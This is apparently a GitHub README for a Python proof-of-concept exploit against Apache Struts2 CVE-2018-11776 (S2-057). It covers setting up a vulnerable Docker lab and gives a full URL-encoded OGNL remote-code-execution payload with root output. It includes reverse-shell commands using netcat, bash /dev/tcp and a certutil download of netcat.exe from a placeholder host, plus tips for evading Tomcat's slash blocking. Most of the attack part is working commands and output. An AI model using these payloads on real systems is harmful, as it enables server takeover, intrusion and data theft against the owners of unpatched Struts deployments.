hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Working Python test and PoC for CVE-2018-11776, originally appearing on; https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
Default configuration is not vulnerable, but if misconfigured... F.
exploit will work fine with the docker container build for cve-2017-5638 (struts2-showcase-2.3.12)
$ docker pull piesecurity/apache-struts2-cve-2017-5638
$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
$ apt-get install vim
$ vim /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
add the configuration below;
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
and also;
<struts>
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
restart your tomcat and/or container
$ /usr/local/tomcat/bin/shutdown.sh
test the url to see if a redirect and evaluation occurs;
http://0.0.0.0:32771/${2+2}/help.action > http://0.0.0.0:32771/4/date.action
with the test script;
$ ./exploitS2-057-test.py http://0.0.0.0:32771/showcase.action
testing the url for exploit; http://0.0.0.0:32771/${12612+24867}/help.action
URL http://0.0.0.0:32771/showcase.action s2-057 CVE-2018-11776 is vulnerable!
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'id'
[Execute]: id
[Url]: http://0.0.0.0:32771/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
uid=0(root) gid=0(root) groups=0(root)
get your box ready to accept the reverse shell;
$ netcat -lvp 31337
run the script;
# you'll want to install netcat
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'apt-get install netcat -y'
# now pop that shell
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'netcat -e "$SHELL" 172.17.0.1 31337'
replace 32771 with your exposed container port
$ netcat -lvp 31337
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 "/bin/bash -i >& /dev/tcp/172.17.0.1/31337 0>&1"
# grab netcat binary
# https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'certutil.exe -urlcache -split -f "https://yourhostingservice.1337/files/netcat.exe" nc.exe'
# execute
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'nc.exe 172.17.0.1 31337 –e cmd.exe'
All requests with a forward-slash (/) will fail because Tomcat actively blocks these, you may need to work around this, for example using environment variables for /bin/bash as $SHELL in the example above.
- https://stackoverflow.com/questions/9719224/coding-forward-and-backward-slashes-in-tomcat-7
- http://engineering.widen.com/blog/tomcat-slashes/
With this in mind, the windows /c flag will not work as expected. I've only tested this on the docker container.
Thanks to @Menin_TheMiddle for showing that the forward-slash issue can be resolved, the code now supports forward-slashes and so a reverse shell without netcat via bash is now also possible, also now supports Windows instances (untested).
Patch your Struts, or simply don't use it.
I guess you can always sell identify fraud products if you happen to have a breach and all your customer details are leaked! (you know who you are, absolute scum)
Thanks to ;
- Man Yue Mo, Semmle for disclosing the vulnerability (https://semmle.com/news/apache-struts-CVE-2018-11776)
- piesecurity for the Dockerfile lab and example of OGNL payload (https://github.com/piesecurity/apache-struts2-CVE-2017-5638)
- xfox64x for the write-up on the method (https://github.com/xfox64x/CVE-2018-11776)
- jiguang7 for the test (https://github.com/jiguang7/CVE-2018-11776)
- @Menin_TheMiddle for the writeup (https://www.secjuice.com/apache-struts2-cve-2018-11776/) and putting me in my place :) code now finally supports windows and bash reverse shell
shout out to vap0rsquad!!! sH3llG0d - Willow - D@3M0¢π1 - n4t4s - 23pieces